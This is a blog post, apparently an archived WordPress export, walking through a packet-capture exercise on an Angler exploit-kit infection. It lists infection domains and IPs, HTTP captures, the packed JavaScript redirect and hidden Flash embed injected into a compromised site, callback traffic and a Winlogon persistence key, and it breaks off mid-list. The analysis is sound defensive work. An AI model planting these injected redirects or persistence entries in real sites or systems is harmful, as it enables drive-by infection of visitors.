{"id":243,"date":"2015-11-05T23:21:11","date_gmt":"2015-11-05T23:21:11","guid":{"rendered":"http:\/\/www.herbiez.com\/?p=243"},"modified":"2016-02-23T21:55:14","modified_gmt":"2016-02-23T21:55:14","slug":"malware-exercise-2015-10-28-midge-figgins-infected-her-computer-2","status":"publish","type":"post","link":"https:\/\/www.herbiez.com\/?p=243","title":{"rendered":"Malware Exercise 2015-10-28 Midge Figgins Infected Her Computer"},"content":{"rendered":"<p>So here is the latest one from Brad &#8211; another good exercise to say the least! One thing to note about this one is that I had some issues extracting objects from the PCAP using Wireshark. In those cases I was able to use Captipper to extract out the HTTP object. Also, I am re-organizing my Github so the individual files from the different labs can be downloaded individually and not as one huge download.  <\/p>\n<p><strong>**Update 06\/11\/2015<\/strong> &#8211; So after reading <a href=\"http:\/\/malware.kiwi\/traffic-analysis-exercise-1028-results\/\" target=\"_blank\">Malware Kiwi&#8217;s blog post<\/a> with his results, and talking to some of the guys at work that did the lab as well, it looks like I missed some things:<\/p>\n<p>&#8211; So I made an assumption that the same binary was being pulled down since content-length was the same, but after thinking about it more this morning that does not make sense since it is coming from 2 different pages off the vu7.ns6rlto.xyz domain.<br \/>\n&#8211; I also failed to extract the Flash exploit found on the vu7.ns6rlto.xyz site. Extracting that out and trying to look at it via JPEXS Flash Decompiler, I can see the binary in the file, and the scripts but have no idea on how to read the scripts. 8-( I have added that to the sites\/files list found at the bottom of the page.  <\/p>\n<div style=\"width: 964px\" class=\"wp-caption aligncenter\"><img loading=\"lazy\" decoding=\"async\" src=\"http:\/\/memesvault.com\/wp-content\/uploads\/Facepalm-Meme-Gif-19.png\" width=\"954\" height=\"844\" class \/><p class=\"wp-caption-text\">Damn it!<\/p><\/div>\n<p>Notes About the Investigation<br \/>\n==============================<\/p>\n<p>&#8211; Date and time of the activity.<br \/>\n&gt; 2015-10-28 12.53 &#8211; 13.01<\/p>\n<p>&#8211; The infected computer&#8217;s IP address.<br \/>\n&gt; 172.16.124.217<\/p>\n<p>&#8211; The infected computer&#8217;s MAC address.<br \/>\n&gt; 18:03:73:dc:25:1a<\/p>\n<p>&#8211; The infected computer&#8217;s host name.<br \/>\n&gt; HooptyDoo-PC<\/p>\n<p>&#8211; Domains and IP addresses of any infection traffic.<br \/>\n&gt; 66.33.210.104 \/ www.mortgagejaw.com<br \/>\n&gt; 5.101.152.119 \/ cosmaxuta.xyz<br \/>\n&gt; 185.46.121.99 \/ bodyfrock.com<br \/>\n&gt; 31.170.160.229  \/ link-for-me1.host56.com<br \/>\n&gt; 5.101.152.119 \/ omisvartrop.xyz<br \/>\n&gt; 31.170.160.59 \/ error404.000webhost.com<br \/>\n&gt; 194.15.126.7 \/ info.albismail.ch<br \/>\n&gt; 178.32.173.181 \/ vu7.ns6rlto.xyz<br \/>\n&gt; 5.8.60.94 \/ truedemocracy9237.com\/systemupdate937.com<\/p>\n<p>&#8211; Information about malware found on the infected host.<br \/>\n&gt; The malware used in this was from an Angler EK. I also see that the file is a dropper as there is another file that gets created in &#8220;C:\\Windows\\SysWOW64&#8221; that maintains persistence via an added registry key. <\/p>\n<p>&#8211; The root cause (what is the likely cause of the infection noted in the pcap).<br \/>\n&gt; Based on what I am able to find this was caused by a compromised website that lead to the EK and the eventual compromise.<\/p>\n<p>Notes about investigation<br \/>\n==========================<\/p>\n<p>So based on what I can see from the PCAP, the user went to Bing and looked for the site &#8220;mortgagejaw.com&#8221; which is where the infection chain starts from based on the fact that I can see an embedded javascript in the main page. So I took what I learned from the last exercise and I changed all the &#8220;eval&#8221; statements to &#8220;alert.&#8221; The following is what I was able to find:<\/p>\n<p><a href=\"http:\/\/www.herbiez.com\/wp-content\/uploads\/2015\/11\/1.png\"><img loading=\"lazy\" decoding=\"async\" src=\"http:\/\/www.herbiez.com\/wp-content\/uploads\/2015\/11\/1.png\" alt=\"Pop-ups 1-5\" width=\"480\" height=\"157\" class=\"aligncenter size-full wp-image-227\" \/><\/a><\/p>\n<p>**Please note that the same popup above is repeated 5 times which makes sense since we see &#8220;cosmaxuta.com\/fd27&#8221; 5 times in the PCAP when looking at HTTP Objects.<\/p>\n<p>We then see the 6th and 7th popups which appear with more links as well:<\/p>\n<p><a href=\"http:\/\/www.herbiez.com\/wp-content\/uploads\/2015\/11\/2.png\"><img loading=\"lazy\" decoding=\"async\" src=\"http:\/\/www.herbiez.com\/wp-content\/uploads\/2015\/11\/2.png\" alt=\"2\" width=\"449\" height=\"172\" class=\"aligncenter size-full wp-image-228\" \/><\/a><\/p>\n<p><a href=\"http:\/\/www.herbiez.com\/wp-content\/uploads\/2015\/11\/3.png\"><img loading=\"lazy\" decoding=\"async\" src=\"http:\/\/www.herbiez.com\/wp-content\/uploads\/2015\/11\/3.png\" alt=\"3\" width=\"455\" height=\"160\" class=\"aligncenter size-full wp-image-229\" \/><\/a><\/p>\n<p>So taking this one-at-a-time, I looked at the link from the 6th EVAL statement (link-for-me1.host56.com) to see what I could find:<\/p>\n<pre class=\"brush: vb; light: false; title: Click here to expand...; toolbar: true; notranslate\" title=\"Click here to expand...\">\r\nGET \/view-info.php HTTP\/1.1\r\nAccept: text\/html, application\/xhtml+xml, *\/*\r\nReferer: http:\/\/www.mortgagejaw.com\/\r\nAccept-Language: en-US\r\nUser-Agent: Mozilla\/5.0 (Windows NT 6.1; WOW64; Trident\/7.0; rv:11.0) like Gecko\r\nAccept-Encoding: gzip, deflate\r\nHost: link-for-me1.host56.com\r\nConnection: Keep-Alive\r\n\r\nHTTP\/1.1 302 Found\r\nDate: Wed, 28 Oct 2015 17:56:24 GMT\r\nServer: Apache\r\nX-Powered-By: PHP\/5.2.17\r\nLocation: http:\/\/error404.000webhost.com\/cpu-limit-reached.html\r\nContent-Length: 0\r\nConnection: close\r\nContent-Type: text\/html\r\n<\/pre>\n<p>From here we are redirected to:<\/p>\n<pre class=\"brush: vb; light: false; title: Click here to expand...; toolbar: true; notranslate\" title=\"Click here to expand...\">\r\nGET \/cpu-limit-reached.html HTTP\/1.1\r\nAccept: text\/html, application\/xhtml+xml, *\/*\r\nReferer: http:\/\/www.mortgagejaw.com\/\r\nAccept-Language: en-US\r\nUser-Agent: Mozilla\/5.0 (Windows NT 6.1; WOW64; Trident\/7.0; rv:11.0) like Gecko\r\nAccept-Encoding: gzip, deflate\r\nConnection: Keep-Alive\r\nHost: error404.000webhost.com\r\n\r\nHTTP\/1.1 200 OK\r\nServer: nginx\/1.6.2\r\nDate: Wed, 28 Oct 2015 18:25:42 GMT\r\nContent-Type: text\/html\r\nLast-Modified: Mon, 26 Oct 2015 19:51:28 GMT\r\nTransfer-Encoding: chunked\r\nConnection: keep-alive\r\nVary: Accept-Encoding\r\nX-Frame-Options: DENY\r\nContent-Encoding: gzip\r\n\r\nb78\r\n...........&#x5B;.S.8......w..j...#$..9.f..rT.|..&#x5B;I....dB....}........I..U.uX...-!...?....w.F.sQ......2.....gY....?G..'.jV.%....2...u..@.H..eY.....M.....u........L.i:.1.+mM..s}.)X......\r\n<\/pre>\n<p>Whoops&#8230; Looks like someone forgot to pay for the upgrade! <\/p>\n<p><a href=\"http:\/\/www.herbiez.com\/wp-content\/uploads\/2015\/11\/4.png\"><img loading=\"lazy\" decoding=\"async\" src=\"http:\/\/www.herbiez.com\/wp-content\/uploads\/2015\/11\/4.png\" alt=\"Whoops\" width=\"1710\" height=\"1078\" class=\"aligncenter size-full wp-image-230\" \/><\/a><\/p>\n<p>Moving on to the next URL from the 7th EVAL statement (bodyfrock.com\/robot.html), I decided to use Captipper over Wireshark since it has a built-in GZIP decompression utility with it. Here is what the request looks like un-compressed and JSBeautified:<\/p>\n<pre class=\"brush: jscript; light: false; title: Click here to expand...; toolbar: true; notranslate\" title=\"Click here to expand...\">\r\nGET \/robot.html HTTP\/1.1\r\nAccept: text\/html, application\/xhtml+xml, *\/*\r\nReferer: http:\/\/www.mortgagejaw.com\/\r\nAccept-Language: en-US\r\nUser-Agent: Mozilla\/5.0 (Windows NT 6.1; WOW64; Trident\/7.0; rv:11.0) like Gecko\r\nAccept-Encoding: gzip, deflate\r\nHost: bodyfrock.com\r\nConnection: Keep-Alive\r\n\r\nHTTP\/1.1 200 OK\r\nDate: Wed, 28 Oct 2015 18:06:33 GMT\r\nServer: Apache\r\nLast-Modified: Sun, 25 Oct 2015 11:58:10 GMT\r\nAccept-Ranges: none\r\nVary: Accept-Encoding\r\nContent-Encoding: gzip\r\nCache-Control: max-age=0\r\nExpires: Wed, 28 Oct 2015 18:06:33 GMT\r\nContent-Length: 328\r\nConnection: close\r\nContent-Type: text\/html\r\n\r\n eval(function(p, a, c, k, e, r) {\r\n    e = function(c) {\r\n        return c.toString(a)\r\n    };\r\n    if (!''.replace(\/^\/, String)) {\r\n        while (c--) r&#x5B;e(c)] = k&#x5B;c]&#x5B;\/c] || e(c);\r\n        k = &#x5B;function(e) {\r\n            return r&#x5B;e]\r\n        }];\r\n        e = function() {\r\n            return '\\\\w+'\r\n        };\r\n        c = 1\r\n    };\r\n    while (c--) if (k&#x5B;c]&#x5B;\/c]) p = p.replace(new RegExp('\\\\b' + e(c) + '\\\\b', 'g'), k&#x5B;c]&#x5B;\/c]);\r\n    return p\r\n}('5 0=2;3(&quot;4.1.6=\\'7:\/\/8.9\/a\\'&quot;,0);', 11, 11, 'delay|location|100|setTimeout|document|var|href|http|omisvartrop|xyz|fwe321d'.split('|'), 0, {})) \r\n<\/pre>\n<p>Looking at this one we see that it is making a call out to the following site:<\/p>\n<p><a href=\"http:\/\/www.herbiez.com\/wp-content\/uploads\/2015\/11\/5.png\"><img loading=\"lazy\" decoding=\"async\" src=\"http:\/\/www.herbiez.com\/wp-content\/uploads\/2015\/11\/5.png\" alt=\"5\" width=\"970\" height=\"334\" class=\"aligncenter size-full wp-image-231\" \/><\/a><\/p>\n<p>Following this we can see that there is a 302 redirect to google.com:<\/p>\n<pre class=\"brush: vb; light: false; title: Click here to expand...; toolbar: true; notranslate\" title=\"Click here to expand...\">\r\nGET \/fwe321d HTTP\/1.1\r\nAccept: text\/html, application\/xhtml+xml, *\/*\r\nReferer: http:\/\/bodyfrock.com\/robot.html\r\nAccept-Language: en-US\r\nUser-Agent: Mozilla\/5.0 (Windows NT 6.1; WOW64; Trident\/7.0; rv:11.0) like Gecko\r\nAccept-Encoding: gzip, deflate\r\nHost: omisvartrop.xyz\r\nConnection: Keep-Alive\r\n\r\nHTTP\/1.1 302 Found\r\nServer: nginx\/1.9.5\r\nDate: Wed, 28 Oct 2015 17:56:25 GMT\r\nContent-Type: text\/html; charset=utf-8\r\nContent-Length: 0\r\nConnection: keep-alive\r\nKeep-Alive: timeout=30\r\nX-Powered-By: PHP\/5.6.14\r\nExpires: Thu, 21 Jul 1977 07:30:00 GMT\r\nLast-Modified: Wed, 28 Oct 2015 17:56:25 GMT\r\nCache-Control: max-age=0\r\nPragma: no-cache\r\nSet-Cookie: c3866=a%3A3%3A%7Bs%3A6%3A%22groups%22%3Ba%3A1%3A%7Bi%3A1%3Bi%3A1446054985%3B%7Ds%3A7%3A%22streams%22%3Ba%3A1%3A%7Bi%3A1%3Bi%3A1446054985%3B%7Ds%3A4%3A%22time%22%3Bi%3A1446054985%3B%7D; expires=Sat, 28-Nov-2015 17:56:25 GMT; Max-Age=2678400; path=\/; domain=.omisvartrop.xyz\r\nLOCATION: http:\/\/google.com\r\n<\/pre>\n<p>The only thing that stands out to me about this request is the &#8220;Set-Cookie&#8221; field. This looks to be URL encoded. A quick decode of this translates to:<\/p>\n<pre class=\"brush: vb; light: false; title: Click here to expand...; toolbar: true; notranslate\" title=\"Click here to expand...\">\r\nc3866=a:3:{s:6:&quot;groups&quot;;a:1:{i:1;i:1446054985;}s:7:&quot;streams&quot;;a:1:{i:1;i:1446054985;}s:4:&quot;time&quot;;i:1446054985;}\r\n<\/pre>\n<p>Unfortunately, I was not able to find anything on Google about this particular string. <\/p>\n<p>So at this time there is nothing that is leading me to a &#8220;smoking gun&#8221; so I continue to look at the PCAP to see what else I could find. So here is were it gets a little weird to me. Looking through the PCAP to see what stands out to me, I can see connections being made to the site &#8220;info.albismail.ch&#8221; from the &#8220;mortgagejaw.com&#8221; site since there is some code calling this site within the \u201cmortgagejaw.com\u201d site:<\/p>\n<pre class=\"brush: vb; light: false; title: Click here to expand...; toolbar: true; notranslate\" title=\"Click here to expand...\">\r\n&lt;body&gt;&lt;div style = &quot;position: absolute;z-index:-1; left:300px; opacity:0;filter:alpha(opacity=0); -moz-opacity:0;&quot;&gt;\r\n&lt;object classid=&quot;clsid:d27cdb6e-ae6d-11cf-96b8-444553540000&quot; id=&quot;EITest&quot; codebase=&quot;http:\/\/fpdownload.macromedia.com\/pub\/shockwave\/cabs\/flash\/swflash.cab#version=8,0,0,0&quot; width=&quot;50&quot; height=&quot;50&quot; align=&quot;middle&quot; &gt;\r\n&lt;param name=&quot;allowScriptAccess&quot; value=&quot;always&quot;\/&gt;\r\n&lt;param name=&quot;movie&quot; value=&quot;http:\/\/info.albismail.ch\/video.php?sid=4E41AAB282B1331F79B50BBC36877B2909B745FAF4F078240E265C8D05A434EA94DC146F2B&quot;\/&gt;\r\n&lt;param name=&quot;quality&quot; value=&quot;high&quot;\/&gt;\r\n&lt;param name=&quot;FlashVars&quot; value=&quot;css=2&amp;id=kphq0cndkuockn0ej1rcig0rjrAkf%3F6G63CCD4%3A4D3553H9%3BD72DDE58%3A99D4%3B2%3BD967HCH6H29%3A462G487E%3AF27C656GC%3B6FE368H4D&quot; \/&gt;\r\n&lt;param name=&quot;bgcolor&quot; value=&quot;#ffffff&quot;\/&gt;\r\n&lt;param name=&quot;wmode&quot; value=&quot;opaque&quot;\/&gt;\r\n&lt;embed src=&quot;http:\/\/info.albismail.ch\/video.php?sid=4E41AAB282B1331F79B50BBC36877B2909B745FAF4F078240E265C8D05A434EA94DC146F2B&quot; quality=&quot;high&quot; bgcolor=&quot;#ffffff&quot;  name=&quot;EITest&quot;  FlashVars=&quot;css=2&amp;id=kphq0cndkuockn0ej1rcig0rjrAkf%3F6G63CCD4%3A4D3553H9%3BD72DDE58%3A99D4%3B2%3BD967HCH6H29%3A462G487E%3AF27C656GC%3B6FE368H4D&quot; width=&quot;50&quot; height=&quot;50&quot; align=&quot;middle&quot; allowScriptAccess=&quot;always&quot; play=&quot;true&quot; type=&quot;application\/x-shockwave-flash&quot; pluginspage=&quot;http:\/\/www.macromedia.com\/go\/getflashplayer&quot; wmode=&quot;opaque&quot;\/&gt;\r\n&lt;\/object&gt;\r\n&lt;\/div&gt;&lt;\/body&gt;  \r\n<\/pre>\n<p>and the connection being made via Wireshark:<\/p>\n<pre class=\"brush: vb; light: false; title: Click here to expand...; toolbar: true; notranslate\" title=\"Click here to expand...\">\r\nGET \/video.php?sid=4E41AAB282B1331F79B50BBC36877B2909B745FAF4F078240E265C8D05A434EA94DC146F2B HTTP\/1.1\r\nAccept: *\/*\r\nAccept-Language: en-US\r\nReferer: http:\/\/www.mortgagejaw.com\/\r\nx-flash-version: 18,0,0,209\r\nAccept-Encoding: gzip, deflate\r\nUser-Agent: Mozilla\/5.0 (Windows NT 6.1; WOW64; Trident\/7.0; rv:11.0) like Gecko\r\nHost: info.albismail.ch\r\nConnection: Keep-Alive\r\n\r\nHTTP\/1.1 200 OK\r\nDate: Wed, 28 Oct 2015 18:51:55 GMT\r\nServer: Apache\/2.2.3 (CentOS)\r\nX-Powered-By: PHP\/5.4.30\r\nContent-Length: 2305\r\nConnection: close\r\nContent-Type: application\/x-shockwave-flash\r\n\r\nCWS.s...x.}VMs...^. .......l7r.D.#..)).j)..A..H..\r\n<\/pre>\n<p>What is weird to me about this is the fact that I am not able to find the connection to  &#8220;info.albismail.ch\/page.php?id=&#8221; anywhere in any of the artifacts. Looking up the domain &#8220;info.albismail.ch&#8221; on Google links me over to a hit on <a href=\"http:\/\/www.virustotal.com\/en\/url\/3709943d98255190a9f86efe5a75ac8d14f6a32aecce97d800627fbdc4decf7d\/analysis\/\" target=\"_blank\">VirusTotal<\/a> which does label this as a &#8220;malware&#8221; site. <\/p>\n<p>Looking at this request via Wireshark I start to realize that I am getting close to my &#8220;smoking gun:&#8221;<\/p>\n<pre class=\"brush: vb; light: false; title: Click here to expand...; toolbar: true; notranslate\" title=\"Click here to expand...\">\r\nGET \/page.php?id=4E41AAB282B1331F79B50BBC36877B2909B745FAF4F078240E265C8D05A434EA94DC146F2B HTTP\/1.1\r\nAccept: text\/html, application\/xhtml+xml, *\/*\r\nReferer: http:\/\/www.mortgagejaw.com\/\r\nAccept-Language: en-US\r\nUser-Agent: Mozilla\/5.0 (Windows NT 6.1; WOW64; Trident\/7.0; rv:11.0) like Gecko\r\nAccept-Encoding: gzip, deflate\r\nHost: info.albismail.ch\r\nConnection: Keep-Alive\r\n\r\nHTTP\/1.1 200 OK\r\nDate: Wed, 28 Oct 2015 18:51:57 GMT\r\nServer: Apache\/2.2.3 (CentOS)\r\nX-Powered-By: PHP\/5.4.30\r\nContent-Length: 444\r\nConnection: close\r\nContent-Type: text\/html; charset=UTF-8\r\n\r\n&lt;html&gt;\r\n&lt;head&gt;\r\n&lt;meta http-equiv=&quot;Content-Type&quot; content=&quot;text\/html; charset=utf-8&quot;&gt;\r\n&lt;meta name=&quot;robots&quot; content=&quot;noindex, nofollow&quot;&gt;\r\n&lt;meta http-equiv=&quot;refresh&quot; content=&quot;0; url='http:\/\/vu7.ns6rlto.xyz\/boards\/search.php?keywords=9185&amp;fid0=jh.3o7a3x94w38'&quot;&gt;\r\n&lt;\/head&gt;\r\n&lt;body&gt;\r\n&lt;script type=&quot;text\/javascript&quot;&gt;\r\nwindow.self.location.replace(&quot;http:\/\/vu7.ns6rlto.xyz\/boards\/search.php?keywords=9185&amp;fid0=jh.3o7a3x94w38&quot;);\r\n&lt;\/script&gt;\r\n&lt;\/body&gt;\r\n&lt;\/html&gt;\r\n<\/pre>\n<p>which then leads to what looks to be an Angler EK landing page (since the landing page is full of what looks to be quotes from Jane Austen, and some other scripts that I do not know how to decode\/decipher):<\/p>\n<pre class=\"brush: vb; light: false; title: Click here to expand...; toolbar: true; notranslate\" title=\"Click here to expand...\">\r\nGET \/boards\/search.php?keywords=9185&amp;amp;fid0=jh.3o7a3x94w38 HTTP\/1.1\r\nAccept: text\/html, application\/xhtml+xml, *\/*\r\nReferer: http:\/\/info.albismail.ch\/page.php?id=4E41AAB282B1331F79B50BBC36877B2909B745FAF4F078240E265C8D05A434EA94DC146F2B\r\nAccept-Language: en-US\r\nUser-Agent: Mozilla\/5.0 (Windows NT 6.1; WOW64; Trident\/7.0; rv:11.0) like Gecko\r\nAccept-Encoding: gzip, deflate\r\nHost: vu7.ns6rlto.xyz\r\nConnection: Keep-Alive\r\n\r\nHTTP\/1.1 200 OK\r\nServer: nginx\/1.2.1\r\nDate: Wed, 28 Oct 2015 17:56:38 GMT\r\nContent-Type: text\/html\r\nContent-Length: 182761\r\nConnection: keep-alive\r\nCache-Control: no-cache, must-revalidate, max-age=1\r\nPragma: no-cache\r\n<\/pre>\n<p>Yep, I am getting closer now since I am seeing POST responses back to the server with, most likely, details about the system so it knows how to exploit it:<\/p>\n<pre class=\"brush: vb; light: false; title: Click here to expand...; toolbar: true; notranslate\" title=\"Click here to expand...\">\r\nPOST \/boards\/business.vrml?indicate=&amp;watch=Key&amp;business=enPOjT9H&amp;hill=tQhLbb&amp;large=ZcK1hBZ_A&amp;poem=9buG&amp;let=F4rI6_X0&amp;bear=Wvp&amp;stage=ci7&amp;stay=VWl0 HTTP\/1.1\r\nAccept: *\/*\r\nContent-Type: text\/html; charset=utf-8\r\nReferer: http:\/\/vu7.ns6rlto.xyz\/boards\/search.php?keywords=9185&amp;fid0=jh.3o7a3x94w38\r\nAccept-Language: en-US\r\nAccept-Encoding: gzip, deflate\r\nUser-Agent: Mozilla\/5.0 (Windows NT 6.1; WOW64; Trident\/7.0; rv:11.0) like Gecko\r\nHost: vu7.ns6rlto.xyz\r\nContent-Length: 188\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\nionGCYAFE43t5u8jDGOIH+D7UTr2jXCzZzmtiHqIIt3XTsuKIVxW\/CptylTBgsK7AgwnVUBY8OWvu1tAq1unDBHCZjoT1\/iRenWvi8OwIEjFHH8pCbgfi5RcF54O1Bgk8lm\/eC8tttpOkIT52eqqdAxi6BA4T8JH5upujc5mRU6OL7W6zwUxNzg0MA==\r\n\r\nHTTP\/1.1 200 OK\r\nServer: nginx\/1.2.1\r\nDate: Wed, 28 Oct 2015 17:56:42 GMT\r\nContent-Type: text\/html\r\nContent-Length: 2384\r\nConnection: keep-alive\r\nCache-Control: no-cache, must-revalidate, max-age=1\r\nPragma: no-cache\r\n\r\n-----\r\n\r\nPOST \/eye.shtml?call=&amp;fail=QamIryu&amp;relation=CLtbHHD&amp;general=dee&amp;have=RExJ&amp;from=&amp;short=jtuaA&amp;money=uilwofDBP&amp;population=w1g3UU&amp;live=SMkLb&amp;white=mo HTTP\/1.1\r\nAccept: *\/*\r\nAccept-Language: en-US\r\nReferer: http:\/\/vu7.ns6rlto.xyz\/compare.srf?moment=&amp;sale=t1wp4ibC&amp;French=&amp;statement=4mEkI6g5X&amp;full=7CPtkEU-&amp;former=3k62&amp;see=&amp;lead=b8EpbS&amp;contain=2yFc\r\nx-flash-version: 18,0,0,209\r\nContent-Type: application\/x-www-form-urlencoded\r\nContent-Length: 196\r\nAccept-Encoding: gzip, deflate\r\nUser-Agent: Mozilla\/5.0 (Windows NT 6.1; WOW64; Trident\/7.0; rv:11.0) like Gecko\r\nHost: vu7.ns6rlto.xyz\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\nYI3bIIEAwbBkkPKch69ksGjWkn2ihQcxBvCi1w\/HZsmJ0uI56miT585omGwmtNC1kYHJrnICm+9dbb9Oy3Bc6VtfieUYahunUC\/5frfYH3+WrL66liF7e5KaoWvxkG3N\/JyieG7m+3kpVeNzmEpufHmONKAPRaEh7oVjigMaKxxSdIZse3MKMTgsMCwwLDIwOQ==\r\n\r\nHTTP\/1.1 200 OK\r\nServer: nginx\/1.2.1\r\nDate: Wed, 28 Oct 2015 17:56:48 GMT\r\nContent-Type: text\/html\r\nContent-Length: 11192\r\nConnection: keep-alive\r\nCache-Control: no-cache, must-revalidate, max-age=1\r\nPragma: no-cache\r\n<\/pre>\n<pre class=\"brush: vb; light: false; title: Click here to expand...; toolbar: true; notranslate\" title=\"Click here to expand...\">\r\nGET \/compare.srf?moment=&amp;sale=t1wp4ibC&amp;French=&amp;statement=4mEkI6g5X&amp;full=7CPtkEU-&amp;former=3k62&amp;see=&amp;lead=b8EpbS&amp;contain=2yFc_a8YdY86P HTTP\/1.1\r\nAccept: *\/*\r\nReferer: http:\/\/vu7.ns6rlto.xyz\/boards\/search.php?keywords=9185&amp;fid0=jh.3o7a3x94w38\r\nAccept-Language: en-US\r\nUser-Agent: Mozilla\/5.0 (Windows NT 6.1; WOW64; Trident\/7.0; rv:11.0) like Gecko\r\nAccept-Encoding: gzip, deflate\r\nHost: vu7.ns6rlto.xyz\r\nConnection: Keep-Alive\r\n\r\nHTTP\/1.1 404 Not Found\r\nServer: nginx\/1.2.1\r\nDate: Wed, 28 Oct 2015 17:56:41 GMT\r\nContent-Type: text\/html\r\nTransfer-Encoding: chunked\r\nConnection: keep-alive\r\n\r\n0\r\n<\/pre>\n<p>There we go &#8211; there is the Flash exploit that I was looking for which then drops the malicious binary onto the system as seen below:<\/p>\n<pre class=\"brush: vb; light: false; title: Click here to expand...; toolbar: true; notranslate\" title=\"Click here to expand...\">\r\nGET \/compare.srf?moment=&amp;sale=t1wp4ibC&amp;French=&amp;statement=4mEkI6g5X&amp;full=7CPtkEU-&amp;former=3k62&amp;see=&amp;lead=b8EpbS&amp;contain=2yFc_a8YdY86P HTTP\/1.1\r\nAccept: *\/*\r\nAccept-Language: en-US\r\nReferer: http:\/\/vu7.ns6rlto.xyz\/boards\/search.php?keywords=9185&amp;fid0=jh.3o7a3x94w38\r\nx-flash-version: 18,0,0,209\r\nAccept-Encoding: gzip, deflate\r\nUser-Agent: Mozilla\/5.0 (Windows NT 6.1; WOW64; Trident\/7.0; rv:11.0) like Gecko\r\nHost: vu7.ns6rlto.xyz\r\nConnection: Keep-Alive\r\n\r\nHTTP\/1.1 200 OK\r\nServer: nginx\/1.2.1\r\nDate: Wed, 28 Oct 2015 17:56:41 GMT\r\nContent-Type: application\/x-shockwave-flash\r\nContent-Length: 83646\r\nConnection: keep-alive\r\nCache-Control: no-cache, must-revalidate, max-age=1\r\nPragma: no-cache\r\n\r\nCWS\r\n\r\n-----\r\n\r\nGET \/period.der?way=&amp;fear=IpvAaZK&amp;policy=dY0J4i&amp;strike=VEM9XGwQ3&amp;history=ohBl5x9B-&amp;stop=KXV&amp;performance=g8g5&amp;class=17XB1rj_WN HTTP\/1.1\r\nConnection: Keep-Alive\r\nHost: vu7.ns6rlto.xyz\r\n\r\nHTTP\/1.1 200 OK\r\nServer: nginx\/1.2.1\r\nDate: Wed, 28 Oct 2015 17:56:48 GMT\r\nContent-Type: application\/octet-stream\r\nContent-Length: 110600\r\nConnection: keep-alive\r\nCache-Control: no-cache, must-revalidate, max-age=1\r\nPragma: no-cache\r\n\r\n-----\r\n\r\nGET \/division.xfdl?performance=&amp;away=uvTteO&amp;note=&amp;afternoon=o7XV9r&amp;day=-Uc0wMYGJ&amp;table=&amp;western=fMDo&amp;action=&amp;son=kXVPuK-7y&amp;catch=FOQk&amp;marriage=pen3iExGo2 HTTP\/1.1\r\nConnection: Keep-Alive\r\nHost: vu7.ns6rlto.xyz\r\n\r\nHTTP\/1.1 200 OK\r\nServer: nginx\/1.2.1\r\nDate: Wed, 28 Oct 2015 17:56:52 GMT\r\nContent-Type: application\/octet-stream\r\nContent-Length: 110600\r\nConnection: keep-alive\r\nCache-Control: no-cache, must-revalidate, max-age=1\r\nPragma: no-cache\r\n<\/pre>\n<p>Once the binary had been pushed down to the client system and executed, we then start to see traffic leaving the infected system over ports 80 and 443 to the IP address of 5.8.60.194 (truedemocracy9237.com and systemupdate937.com). The traffic is protected via a SSL certificate from what I can see. Also, Hybrid-Analysis states that these connections do not use a HTTP header hence why this traffic never shows up using the \u201chttp.request\/http\u201d filter or in the HTTP Export Objects:<\/p>\n<p><a href=\"http:\/\/www.herbiez.com\/wp-content\/uploads\/2015\/11\/6.png\"><img loading=\"lazy\" decoding=\"async\" src=\"http:\/\/www.herbiez.com\/wp-content\/uploads\/2015\/11\/6.png\" alt=\"6\" width=\"2093\" height=\"1219\" class=\"aligncenter size-full wp-image-233\" \/><\/a><\/p>\n<p><a href=\"http:\/\/www.herbiez.com\/wp-content\/uploads\/2015\/11\/7.png\"><img loading=\"lazy\" decoding=\"async\" src=\"http:\/\/www.herbiez.com\/wp-content\/uploads\/2015\/11\/7.png\" alt=\"7\" width=\"2494\" height=\"1200\" class=\"aligncenter size-full wp-image-234\" \/><\/a><\/p>\n<p>Lastly, I ran the executable on my test VM to see what it does. I used Regshot to see what was written to the system after running a &#8220;snapshot,&#8221; and I noticed a couple of things within the Regshot log:<\/p>\n<pre class=\"brush: vb; light: false; title: Click here to expand...; toolbar: true; notranslate\" title=\"Click here to expand...\">\r\nValues added:\r\n----------------------------------\r\nHKU\\S-1-5-21-3862639240-4259269860-3308957193-500\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Shell: &quot;&quot;C:\\windows\\SysWow64\\bjxbrgu.exe&quot; \/shell&quot;\r\n\r\nFiles added:\r\n----------------------------------\r\nC:\\windows\\SysWOW64\\bjxbrgu.exe\r\n<\/pre>\n<p>When looking into this a little further, I did see the binary &#8220;bjxbrgu.exe&#8221; had hooked itself into the &#8220;explorer.exe&#8221; process and was making the same outbound connections to 5.8.60.194 as seen in the PCAP:<\/p>\n<p><a href=\"http:\/\/www.herbiez.com\/wp-content\/uploads\/2015\/11\/8.png\"><img loading=\"lazy\" decoding=\"async\" src=\"http:\/\/www.herbiez.com\/wp-content\/uploads\/2015\/11\/8.png\" alt=\"8\" width=\"2494\" height=\"1200\" class=\"aligncenter size-full wp-image-234\" \/><\/a><\/p>\n<p>Outside analysis about URLs and files<br \/>\n======================================<\/p>\n<p>Site: www.mortgagejaw.com<br \/>\nDetection ratio: 2 \/ 66<br \/>\nVirustotal link: <a href=\"http:\/\/www.virustotal.com\/en\/url\/e7ef60a896dd8f75e78c0dd072fae71064f77299a730c1086b2e576793119a17\/analysis\/1446649831\/\" target=\"_blank\">http:\/\/www.virustotal.com\/en\/url\/e7ef60a896dd8f75e78c0dd072fae71064f77299a730c1086b2e576793119a17\/analysis\/1446649831\/<\/a><\/p>\n<p>Site: cosmaxuta.xyz\/fd27<br \/>\nDetection ratio: 5 \/ 65<br \/>\nVirustotal link: <a href=\"http:\/\/www.virustotal.com\/en\/url\/1786f769fb84380db4dc6eba547319626c6c75bc4dd665098bd931970805b992\/analysis\/\" target=\"_blank\">http:\/\/www.virustotal.com\/en\/url\/1786f769fb84380db4dc6eba547319626c6c75bc4dd665098bd931970805b992\/analysis\/<\/a><\/p>\n<p>Site: bodyfrock.com\/robot.html<br \/>\nDetection ratio: 0 \/ 65<br \/>\nVirustotal link: <a href=\"http:\/\/www.virustotal.com\/en\/url\/a75417c10bc91336fdb66554dfe3422dc2eff776d6af70fa40c9ff68363f16cf\/analysis\/\" target=\"_blank\">http:\/\/www.virustotal.com\/en\/url\/a75417c10bc91336fdb66554dfe3422dc2eff776d6af70fa40c9ff68363f16cf\/analysis\/<\/a><\/p>\n<p>Site: link-for-me1.host56.com\/view-info.php<br \/>\nDetection ratio: 2 \/ 65<br \/>\nVirustotal link: <a 